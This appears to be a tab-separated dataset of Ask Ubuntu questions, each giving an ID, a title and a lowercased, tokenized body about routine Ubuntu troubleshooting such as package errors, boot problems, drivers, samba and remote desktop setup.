08:29 extlinux drwxr-xr-x 3 root root 7168 apr 2 21:21 grub -rw-r -- r -- 1 root root 14217519 apr 2 21:31 initrd.img-3.2.0-58-generic-pae drwx -- -- -- 2 root root 12288 oct 13 2012 lost+found -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 2321986 dec 3 20:02 system.map-3.2.0-58-generic-pae -rw -- -- -- - 1 root root 5031904 dec 3 20:02 vmlinuz-3.2.0-58-generic-pae
442587	my samsung ml1865 printer is not listed	i am also having a problem with a samsung ml 1865 printer , when trying to install its not a listed printer and does not print , it gives an error message saying internal error and to use the correct driver , i see another post with the same problem , can anybody point us in the right direction ?
442596	how to rresolve the error : /var/cache/apt/archives/wireshark-common_1.11.3+svn54990-0ubuntu1~saucy1~ppa0_amd64.deb	i have an ubuntu 13.10 and try to install wireshark on it . but i keep on getting the following error . mininet @ ubun_13_10 : ~/mininet $ sudo apt-get install wireshark reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-image-3.8.0-35-generic linux-image-extra-3.8.0-35-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : wireshark-common suggested packages : snmp-mibs-downloader the following new packages will be installed : wireshark the following packages will be upgraded : wireshark-common 1 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/18.7 mb of archives . after this operation , 75.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y sh : 0 : getcwd ( ) failed : no such file or directory sh : 0 : getcwd ( ) failed : no such file or directory sh : 0 : getcwd ( ) failed : no such file or directory ( reading database ... 318716 files and directories currently installed . ) preparing to replace wireshark-common 1.10.2-1 ( using ... /wireshark-common_1.11.3+svn54990-0ubuntu1~saucy1~ppa0_amd64.deb ) ... unpacking replacement wireshark-common ... dpkg : error processing /var/cache/apt/archives/wireshark-common_1.11.3+svn54990-0ubuntu1~saucy1~ppa0_amd64.deb ( -- unpack ) : trying to overwrite '/etc/wireshark/init.lua ' , which is also in package libwireshark-data 1.10.6-1ubuntu2~ppa2~s dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) selecting previously unselected package wireshark . unpacking wireshark ( from ... /wireshark_1.11.3+svn54990-0ubuntu1~saucy1~ppa0_amd64.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for mime-support ... processing triggers for menu ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/wireshark-common_1.11.3+svn54990-0ubuntu1~saucy1~ppa0_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) mininet @ ubun_13_10 : ~/mininet $ mininet @ ubun_13_10 : /etc/init.d $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' mininet @ ubun_13_10 : /etc/init.d $ what should i do to resolve the above error ?
442597	ubuntu sdk : error with first app	i am just starting to develop with the ubuntu sdk . i created a default html5 project , and i havent changed anything . this is the error : starting ubuntu-html5-app-launcher -- www=/home/ryan/documents/ubuntu workspace/myfirstapp/www -- inspector ignoring argument : `` workspace/myfirstapp/www '' www folder not found or not a proper directory : `` /home/ryan/documents/ubuntu '' ubuntu-html5-app-launcher exited with code 1 how do i resolve this issue ? thanks .
442606	download and installation	i downloaded ubuntu to the hard drive ( c ) and it downloaded into drive ( f ) which i assume is a partitioned drive off ( c ) . i have a stick memory as drive ( e ) . when i access the ubuntu executable , a screen comes up and asks me to re-boot . i did and nothing happened . what am i doing wrong ? the machine is a amd6400 64 bit , running win 8.1 pro with 4 gb of memory , 500 gb hard drive .
442608	missing usb devices on thinkpad x1	i 've been running ubuntu 13.10 on my thinkpad x1 carbon for 6 months . a couple of months ago the camera spontaneously stopped working ; i 'm not sure what the trigger was , but it could have been an update . now i see that the bluetooth is not working either . neither of the devices seem to be recognized ( e.g . there is no /dev/vid* ) . output of lsusb : bus 002 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 0eef:790a d-wav scientific co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the devices work fine in both windows 8 and the live usb that i used for the original 13.10 install . here 's the output of lsusb from the live usb version : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 0eef:790a d-wav scientific co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0951:1666 kingston technology bus 001 device 004 : id 147e:2020 upek bus 001 device 005 : id 0a5c:21e6 broadcom corp . bus 001 device 006 : id 5986:0266 acer , inc as you can see , there are many more devices ; i believe that the last three lines are the fingerprint reader , the bluetooth adapter and the camera , respectively . why do they not appear above ? could they be connected through the `` integrated rate matching hub '' , which is also missing ? i upgraded to 14.04 beta today hoping that a bug might have been fixed , but the problem persists . edit : the live usb i mentioned is running the kernel from linux-image-3.8.0-19-generic . i just booted that kernel with the installed version of ubuntu , but the same problem persists , so it 's not obvious to me whether or not this is a kernel issue .
442610	debootstrap warning during installation - 12.04 lts server - vmware virtual machine	created a virtual machine in vmware and pointed to my fresh download of ubuntu server 12.04 lts . attempted install a few times and receive a `` debootstrap warning '' that reads : warning : http : //192.168.10.1/ubuntu/dists/lucid/restricted/binary-amd64/packages was corrupt first noted problem - the distro is not located at 10.1 , but is on a mounted iso on the vmware datastore ( 10.15 , just for fun ) . i can choose to continue and `` an '' install completes , but the login screen indicates that it is ubuntu 10.04.3 kickseed that installed ( curious ) . attempting to perform an update , i note that most of the entries in /etc/apt/sources.list are hosed , and have entries like : deb http : //192.168.10.1/ubuntu/ lucid universe hmmm . what would cause the re-write of the sources.list file , and how would you `` fix it '' ? i 'm concerned that if i add additional virtual machines in the future , this will be a recurring problem ... i 've been looking for the `` right '' sources list so i could copy the information into it , but have n't located a good working list yet . that still leaves the long-term impact to resolve however . thanks for your thoughts in advance .
442612	conffile 'file.conf ' is not in sync with other instances of the same package	i am running ubuntu 12.04 . the cause of the problem was that i installed gkrellm.i386 ! i can see out there that there are many many ideas of possible solutions to this problem , but i have tried everything . try repeat sudo apt-get update , .. sudo apt-get -f install dpkg -- configure -a , sudo apt-get clean apt-get clean , sudo apt-get autoclean apt-get update , ... apt-get upgrade dpkg -- get-selections `` * '' > package.list ( remove libsenseo4 from list ) , ... dpkg -- set-selections < package.list , ... apt-get -u dselect-upgrade and i always ends with : dpkg : error processing /var/cache/apt/archives/libsensors4_1 % 3a3.3.1-2ubuntu1_i386.deb ( -- unpack ) : conffile './etc/sensors.d/.placeholder ' is not in sync with other instances of the same package errors were encountered while processing : /var/cache/apt/archives/libsensors4_1 % 3a3.3.1-2ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i can not install synaptic package manager or anything else until i have solved the problem . the paradox : gkrellm : i386 : depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.5 is installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.26.1-1 is installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.32.4-0ubuntu1 is installed depends : libgnutls-openssl27 but it is not installed depends : libgnutls26 ( > = 2.12.6.1-0 ) but 2.12.14-5ubuntu3.7 is installed depends : libgtk2.0-0 ( > = 2.18.0 ) but 2.24.10-0ubuntu6 is installed depends : libice6 ( > = 1:1.0.0 ) but 2:1.0.7-2build1 is installed depends : libntlm0 but it is not installed depends : libsensors4 ( > = 1:3.0.0 ) but 1:3.3.1-2ubuntu1 is installed my question is where is all the info about the installed libraries stored ? because when i try remove a library it is automatically installed again and the file ./etc/sensors.d/.placeholder is empty ( and it doesnât help removing that either ) .
442619	could not initialize class sun.awt.x11graphicsenvironmen	i 'm trying to run a shell in a unix server and send the display in graphical mode to a workstatio , i 'm seting the display variable as $ export display= < ipadrees:0.0 > where the ip address is my workstation , but in the server i 'm receiving the following error message : exception in thread `` main '' java.lang.noclassdeffounderror : could not initialize class sun.awt.x11graphicsenvironment at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:173 ) at java.awt.graphicsenvironment.getlocalgraphicsenvironment ( graphicsenvironment.java:68 ) at sun.awt.x11.xtoolkit. < clinit > ( xtoolkit.java:89 ) at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:173 ) at java.awt.toolkit $ 2.run ( toolkit.java:835 ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.getdefaulttoolkit ( toolkit.java:827 ) at sun.swing.swingutilities2 $ aatextinfo.getaatextinfo ( swingutilities2.java:128 ) at javax.swing.plaf.metal.metallookandfeel.initcomponentdefaults ( metallookandfeel.java:1556 ) at javax.swing.plaf.basic.basiclookandfeel.getdefaults ( basiclookandfeel.java:130 ) at javax.swing.plaf.metal.metallookandfeel.getdefaults ( metallookandfeel.java:1591 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:545 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:585 ) at com.infy.fintools.ui.apdm_screen.main ( unknown source ) i found this solution exception on desktop [ sic ! ] sun.awt.x11graphicsenvironment but it was created a few years ago , so i try to apply the solution , did n't work . my ubuntu workstation has the openjdk java6 any ideas ? please !
442620	jpilot will not sync tungsten	have spent weeks trying to sync a palm tungsten e2 without success . i have run various scripts to the point that i think i have compromised my system . i will ask . has anyone ever successfully synced a tungsten palm device with jpilot ?
442624	setup config for my ssd [ ultrabay t430 ]	there are a lot of blog posts about how to configure ubuntu when using an ssd . the ones i found rely on editing /etc/fstab . unfortunately my file looks different from their samples which is why i 'm unsure how to proceed . this is my setup : t430 laptop ; ubuntu 12.04 lts ; ubuntu is installed on an ssd located in my ultra-bay slot . there is a windows installation on my main hdd . this is the content of fstab : # unconfigured fstab for base system /host/ubuntu/disks/swap.disk none swap sw 0 0 nothing in /etc/fstab.d/ : ll /etc/fstab.d drwxr-xr-x 2 root root 1024 mar 30 2012 ./ drwxr-xr-x 144 root root 9216 apr 3 10:15 ../ according to site 1 or site 2 i should be able to see a list of all disk there and then add some flags for my ssd but all i see are the two lines above . any idea how i should proceed ? thanks a lot .
442627	install ubuntu on new acer aspirev5-123-3659	when i start with bootable usb flash drive , ubuntu starts , i press install , and a few seconds later it jams . have tried different media , different versions of ubuntu . help please !
442630	webcam software with motion detection help with motion	greetings i am searching for some ubuntu software for using webcam . it needs to be able to record video with motion detection with the option of saving it to disk . i have tried zoneminder and found way too complex to use . i am looking for something simple , preferably something with a gui . everyone keeps mentioning 'motion ' however i it seems very complicated . if motion is the best way to go , could someone please take the time to insctruct me on how to set it up to capture video ? i have read this tutorial on setting it up , but there is no mention of capturing video files . i also have read this ffmpg article but have no clue how to set it up ( i do have it installed ) . i am running ubuntu 12.04 thanks for your time .
442631	ubuntu 12.04 and nexus 7 ( 2013 )	how can i get ubuntu 12.04 lts to recognize my nexus 7 ( 2013 ) so i can transfer files between the two systems ?
442632	exiting scrollback mode in byobu	in byobu , i am able to enter scrollback mode with f7 . however , i am not able to exit by pressing esc as documented . nothing happens when i press esc . in contrast , when i am in screen , i am able to enter scroll back and exit by pressing esc . ( oddly , i also ca n't access scrollback by hitting alt-pgup . maybe a terminal emulator issue ? )
442634	how can i customise the launcher icons and add a few files to the homedir of the to-be-user ?	i 've looked at in oem installations can we edit final-user applications setting ? and how do i pre-install ubuntu for someone ( oem install ) ? the latter offered an amazing guide on how to perform the actual oem install , but does n't answer `` how can i customise the launcher icons and add a few files to the homedir of the to-be-user '' . neither of them offered the answer i fear . the oem setup is fine , works well too . i just ca n't get a few dot files made for the to-be-user . one is a config file for our vpn client ( server name and the likes ) and the other are config files for our vmware view client . it 's for a-technical users , hence the oem option being so nice . i assumed at first , since you can change `` settings '' , i 'd add them as oem user , but since its homedir gets removed - no dice . i tried via upstart and init.d several times but i could n't get it to execute . i also tried to use the system prefs > startup applications . i 've tried looking at oem-config/late_command but it 's beyond me . i am sorry . i 've been looking for the answer for over 2 days now , tried everything i could find - but i 've come up empty handed . i forgot to mention : my attempts ( and a few versions for various alternatives to the oem install ) can be found here https : //gist.github.com/moonwitch
442635	installing new icons/themes/etc	i 'm trying out 14.04 beta . when i used 13.10 , i found a way to access the root folder , which i seem to have forgotten - i did that in order to add icon themes and cursor themes to ubuntu , as there does not seem to be a user friendly way to do this -- -everything i read tells me to extract what i 've downloaded to the icons folder , but there is no such folder i can get to without being told i do not have permission . when i had root access , i simply would open the root folder and extract the cursor/icon themes in the appropriate sub folders there . is there a simple way to do what i want ? i really do n't think it should be this difficult .
442640	dnsmasq unrecognized command	i 'm attempting to run a script which calls service dnsmasq restart service dnsmasq restart dnsmasq : unrecognized service no matter what i call for dnsmasq , it gives me the `` unrecognized service '' error . also if i type dnsmasq restart i get dnsmasq restart dnsmasq : junk found in command line i have tried autoremoving and reinstalling dnsmasq . i 've googled both responses , and not finding any fixes . can anyone help ? thanks !
442641	how to disable a passwordless account	i have set my nephew 's account to login without a password , but sometimes i want to prevent that account from logging in . this is the process i followed : set the account to login with no password , save the changes set the account to disabled , save the changes after rebooting the login screen still allows his account to login without a password . in other words , i 've set the account to disabled , but it 's still it 's possible to login from that account without a password . is this a bug ? how can i disable an account which has no password ? is there a workaround i can use ?
442644	how to make xterm to send the alt key to emacs as meta ?	i see that this question has been asked multiple times . the solutions given there in does not seem to apply to my setup . here is my story : i use ubuntu 12.0.04 lts , with xmonad ( not over gnome ) , and use xterm for my work . i would prefer to use xterm rather than a different terminal or emacs own window . when using emacs -nw , i see that alt is not recognized . i verified using xev that alt is indeed getting generated . further , if i am using rxvt , i see that alt is getting recognized by emacs -nw . i am using evil mode ( as a long time vim user , and an emacs newbee ) , and i would really prefer not having my escape key rebound as alt ( which was the solution given in another thread ) . what should i do ? ( if it helps , alt-x on the xterm window without emacs running generates `` ă¸ '' or if i run emacs -nw -q ) .
442649	can browse samba server but ca n't write to it	so i have a ubuntu server 12.04.4 running samba on my network . i can browse and view the files on my server but i ca n't write to the server . every time i try i get a prompt for my username and password and then it says items can not be copied because you do n't have permission to read them i 'm running a macbook pro osx 10.9.2 . i also wanted to know if i need to make an entry for each individual directory in the home directory or if they 're covered under this one . thanks the chmod 777 command worked but my only question regarding it is will i be able to restrict access to it using the valid users line in the samba config file . [ home ] comment = home path = /home browseable = yes available = yes directory mask = 0775 read only = no writable = yes valid users = daniel force user = daniel
442655	wireless wo n't work on hp pavilion	i was using windows 7 on my notebook hp pavilion dv 6000 and the wireless connection was working well . when i changed to ubunutu 12.04 somethig went wrong and it stopped working . i 've already search many forum but the `` rfkill list all '' and `` unblock all '' do n't have any output . the computer have a hardware swtich to turn on and off the wireless , but when ubuntu is running it show a red led no matter what position . some one can help me ? its there any way to make it work ? best regards , felipe .
442657	what does `` desc_blocks '' in resize2fs means ?	i expanded my partition with resize2fs after expanding my logical volume . it was a success , but i am curious what is the meaning of old_desc_blocks and new_desc_blocks when i run sudo resize2fs /dev/ubuntu/root which reports the following : resize2fs 1.42 ( 29-nov-2011 ) resize2fs : device or resource busy while checking for on-line resizing support filesystem at /dev/ubuntu/root is mounted on / ; on-line resizing required old_desc_blocks = 32 , new_desc_blocks = 59 man page of resize2fs does not explain its meaning .
442664	nautilus does not start properly : creates pid but no window : starts as root	can anyone help me fix this , please ? starting nautilus creates no window . from a terminal , i get : > nautilus ** message : init stock icons initializing nautilus-ideviceinfo extension initializing nautilus-gdu extension initializing nautilus-open-terminal extension nautilus-wipe-message : initializing ... and nothing else . using ps i see : ps -ef| grep nautilus homer 13567 1 1 12:07 ? 00:00:00 nautilus /home/homer homer 13648 13581 0 12:07 pts/2 00:00:00 grep -- color=auto nautilus using ctrl-c or ctrl-z has no effect : ^c^c^c^z^z^z < - ( nothing happens ) i have to kill it from another terminal or system monitor . starting as root i get : > nautilus ** message : init stock icons initializing nautilus-ideviceinfo extension initializing nautilus-gdu extension initializing nautilus-open-terminal extension nautilus-wipe-message : initializing ** ( nautilus:13802 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed ** ( nautilus:13802 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed ... and nautilus starts . ctrl-z also now works . ^c^c^c^z [ 1 ] + stopped nautilus root @ blackbox ~ > fg nautilus ... nautilus still keeps running , even when i exit nautilus using alt-f4 . i have to use a second terminal to kill it . what i 've tried according to other posts reinstalling nautilus looking at permissions for the binary .
442666	how to install complete , easily updatable latex system with text editor front-end ?	i 'm new to xubuntu , having used windows xp for many years . on windows i ran miktex , with editors/front-ends winedt and texworks . i found the miktex package manager and update tools to be especially useful . i 'm now running xubuntu 12.04 lts . how should i install a complete , easily updatable latex system with text editor/front end ?
442667	problem with gcov , can not run	so i 'm trying to optimize a file called linpack.c . i have to use gcov to find the 10 most executed lines . i 've been given these compiler options : -fprofile-arcs -ftest-coverage -o2 so i ran this $ gcc -fprofile-arcs -ftest-coverage -o2 linpack.c the output was linpack , linpack.gcno . now when i try to run gcov linpack.c in order to generate linpack.c.gcov i get an error : linpack.gcda , can not open data file . can someone tell me what i 'm doing wrong ? this should be straightforward but i have been struggling for more than an hour now .
442668	some functionality is not working on gnome	currently i 'm having a lot of issue of shortcut functionality on gnome . issue having : ctrl+super+d is not working ( back top desktop ) can not open weather and dropbox application but they are just showing at the bottom line when in dash mode . some application is running but could not find out when press alt+tab / ctrl+alt+ďżş/ďżź bonus issue on unity desktop : keyboard language switching does n't work in unity but works fine in gnome .
442669	printer margin problem	problem with printer margins in ubuntu . brother mfc-235c prints correct margins for `` anything.doc '' from dell xp pro laptop . copy the same file across to desktop running ubuntu 12.04lts [ checked that margins set to the same values ] and in print preview it looks fine but actual paper print has wrong margins . how to fix please ? edit 3 hrs later - i have updated the brother driver ( s ) as per http : //support.brother.com/g/b/downloadlist.aspx ? c=au & lang=en & prod=mfc235c_eu_as & os=127 but still the incorrect margins problem persists . real assistance required please
442673	ca n't find org.gnome.shell.recorder in gsettings	i am trying to do screen recording on ubuntu 12.04 lts and supposedly pressing ctrl+alt+shift+r will do it . in order to get audio i found on a different post that i need to run the command : gsettings set org.gnome.shell.recorder pipeline `` queue ! videorate ! vp8enc quality=10 speed=2 ! mux . pulsesrc ! audio/x-raw-int ! queue ! audioconvert ! vorbisenc ! mux . webmmux name=mux '' however when i run this i get no such schema org.gnome.shell.recorder . how can i fix this ? do i need to install the schema somehow ? i have been unable to find anything on this . thanks
442679	no internet connection on kde network manager	added connection dsl - > entered servicename , username , password - > ok after that no connection seen in this dialog box ! some how did connection with sudo pppoeconf but it takes sometime reboot . is there any other network manager for kde ? any help will be appreciated !
442680	can not upgrade catfish file searching tool	i receive the following error messages attempting to upgrade the catfish file searching tool : the following packages have been kept back : catfish the following packages have unmet dependencies : catfish : depends : python3-pexpect but it is not installable e : unable to correct problems , you have held broken packages . so when i attempt to install the missing unmet dependency python3-pexpect i receive the following error message : package python3-pexpect is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'python3-pexpect ' has no installation candidate please advise on how i may be able correct this issue so i am able to upgrade catfish and remove the program from being held back . i am afraid to completely uninstall and then reinstall catfish as the python3-pexpect package is not available and if it is required for the upgrade then i fear i will not be able to reinstall catfish at all . thank you !
442681	i plug in my headphones , and ubuntu decides i 've got my lmb held	for about a week , often when i locked the computer , i 'd return to find that my left mouse button was not recognized . i had a graphical tablet , a mouse , and a touchpad , and i could n't click . mouseover was treated accordingly , as was scroll , rmb , and mmb , but lmb was totally ignored . it still happens a bit now , but i can fix it by going to the switch user screen and logging in from there . today , i plug in my logitech ca n't remember the model number usb headphones and as soon as they 're recognized , the computer behaves as if i 'm holding down the lmb , and there 's no way to get it to think otherwise but unplug the headphones . i ca n't use that . additionally , i suffer frequent kernel panics when not booted into kernel vblah.blah.blah.14 and bizarre graphical glitches that look painted onto the screen , as if there was physical damage , that foretell of a random application crash or logout or reboot . and xorg is a memory hog . ubuntu 13.10 , ati radeon xpress 200m , all drivers current .
442682	control loading of kernel module automatically	when i do rmmod usb_storage and then dmesg i can see the output saying usb_storage deregistered . but when i attach a flash drive and then dmesg , it says initializing usb mass storage driver ... [ 16565.129239 ] scsi41 : usb-storage 1-1:1.0 [ 16565.130134 ] usbcore : registered new interface driver usb-storage [ 16565.130172 ] usb mass storage support registered . how do i manually insert/remove the module without it automatically getting loaded ?
442685	copy table from libreoffice calc in word document	when i use libreoffice calc , i copy my table from libreoffice calc in libreoffice writer . but when i want to save de document in word type , the table was disappear.. so what must i do ? cause almost all my friend did n't use libreoffice writer.. thank you so much
442686	ubuntu wont boot after setting up build environment	i dualbooted my pc , with ubuntu 12.04 alongsite windows 7 64 bit ... . i tried to set up build -environment on my linux so that i could compile a custom recovery for my device ... so i followed post 2 and post 3 from this thread i installed everything which are to be installed in ubuntu 12.04 ... .everything went well ..so atlast i rebooted my workstation ... well , its never booted after that..whenever i select ubuntu in grub , i get only black screen , nothing else ..can you please say what wrong did i actually do while installing or is there any lib which i should n't installed . ? ..any workaround to avoid this kind of error 's .. ? ?
442688	ca n't update or install anything . ubuntu 3.11.0.14	this is the result i get trying to get updates . internet connection is fine , if i put the url 's in a browser , it gets to the address and downloads packages ok.. what is the fix for this error could not resolve hostname ? lots of these errors ocur , i am only allowed to post 2 links.. $ sudo apt-get update [ sudo ] password for quinco : err http : //au.archive.ubuntu.com saucy-backports release.gpg could not resolve 'hostname' err http : //au.archive.ubuntu.com saucy-security release.gpg could not resolve 'hostname'
442690	transfer files from virtualbox ubuntu server /var/www to local ubuntu	i have a ubuntu virtualbox installed ubuntu server . my local machine has ubuntu 12.04 os . i need to copy files from the /var/www in the virtualbox ubuntu server in to my local machine . ( my network settings in virtualbox is `` bridged adapter '' and it has a static ip : 192.168.56.101 ) my local mchine ip is : 192.168.56.1 i tried following scp -r test.php nilani @ 192.168.56.1 : it says port 22 : no route to host lost connection . what is wrong here ?
442692	windows is not load from grub	so i installed ubuntu . and a little time it continues - i could to load windows from grub , and all was right . but something happened and now when i choose windows 7 x64 on my grub list it says that cant find my windows bus i see my windows folders on my hard disk ( that is all right ) . i have updated my grub , windows string disappeared . as i understand , i need to find the way to windows loader , and write it to any config file in my grub configuration . but it is only theory . help me please . how to recover windows in my grub . ubuntu is installed to other disk than windows , so it is separated . also i had checked file system status in my ubuntu disk utility - it says that my file system ( where 7 installed ) is damaged . i do n't know how to care it . upd : output of sudo fdisk -l : диск /dev/sda : 320.1 гб , 320072933376 байт 255 головок , 63 секторов/треков , 38913 цилиндров , всего 625142448 секторов units = секторы of 1 * 512 = 512 bytes sec size ( log/phys ) : 512 байт / 512 байт i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk id : 0xf2efcaf5 load dev . beg end блоки id система /dev/sda2 206848 599878722 299835937+ 7 hpfs/ntfs/exfat /dev/sda4 599879678 625141759 12631041 5 расширенный /dev/sda5 621045760 625141759 2048000 82 linux своп / solaris /dev/sda6 599879680 621043711 10582016 83 linux boot repair logs : initial . after doing custom repair . upd : executed bootrec /fixboot in system repair . windows string appeared again . but ca n't load : error of type 000000xc000000000 end to 428
442693	internet seems ridiculously slow	at this current time.. it 's letting me post . i think i may have posted before on this issue , but i ca n't find the topic anymore . i installed ubuntu 13.10 on here , and it was working to start . now when i boot up my laptop it wo n't load webpages ( sometimes it might if i wait like 10 minutes . ) it 's going fast currently , but still when i boot i have to disconnect the wifi and then connect again for it to work . i have n't tried windows on here.. but the other 2 laptops with windows 7 work just fine . earlier today though , it was just god awful slow no matter how many times i disconnected my modem , rebooted , and disabled/re-enabled wifi on here . i did try booting up a live fedora cd to see if i had the same problem , but i did not . details : laptop is a toshiba satellite c75d-a running the command # [ sudo lshw -c network ] gets me this information , let me know if you need me to run anything else . [ description : wireless interface product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 01 serial : 64:5a:04 : c0:13:1f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8188ee driverversion=3.11.0-19-generic firmware=n/a ip=10.0.0.8 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:32 ioport:2000 ( size=256 ) memory : f0100000-f0103fff ] thank you for taking your time to read this and for any help . : )
442698	ca n't install 7zip in ubuntu 13.10	when i try to install 7zip in the ubuntu software center , it reports it is available from the universe repository . i click on `` use this source '' , i authenticate and nothing happens . this is the case for everything i try to install , although my internet connection is fine . and when i run the command sudo apt-get update i get the following results : ign private-ppa.launchpad.net saucy inrelease err archive.ubuntu.com saucy inrelease err archive.ubuntu.com saucy release.gpg could not resolve 'hostname ' update : [ reply to comment ] quinco @ quinco-compaq-linux : ~ $ cat /etc/apt/sources.list deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ] / raring main restricted deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //au.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //au.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //au.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy universe deb http : //au.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //au.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //au.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //au.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //au.archive.ubuntu.com/ubuntu/ saucy-security main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-security main restricted deb http : //au.archive.ubuntu.com/ubuntu/ saucy-security universe deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-security universe deb http : //au.archive.ubuntu.com/ubuntu/ saucy-security multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse # deb-src http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse # deb-src http : //archive.ubuntu.com/ubuntu saucy universe deb http : //au.archive.ubuntu.com/ubuntu/ saucy-proposed multiverse main restricted universe another update : quinco @ quinco-compaq-linux : ~ $ cmake -- version the program 'cmake ' is currently not installed . you can install it by typing : sudo apt-get install cmake quinco @ quinco-compaq-linux : ~ $ sudo apt-get install cmake [ sudo ] password for quinco : reading package lists ... done building dependency tree reading state information ... done package cmake is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'cmake ' has no installation candidate
442700	trying to use xrdp and use ports for each user	it 's been a suggestion to use port 5912 if you want a user to connect only to that port so that they can return into their session . i 've done this to my root user , delta , and it worked shortly until the next reboot to receive this error . http : //puu.sh/7u4sx.jpg in my xrdp.ini , this is what you see for the few sessions [ xrdp1 ] name=delta lib=libvnc.so username=delta password=ask ip=127.0.0.1 port=5912 [ xrdp2 ] name=beta lib=libvnc.so username=beta password=ask ip=127.0.0.1 port=5913
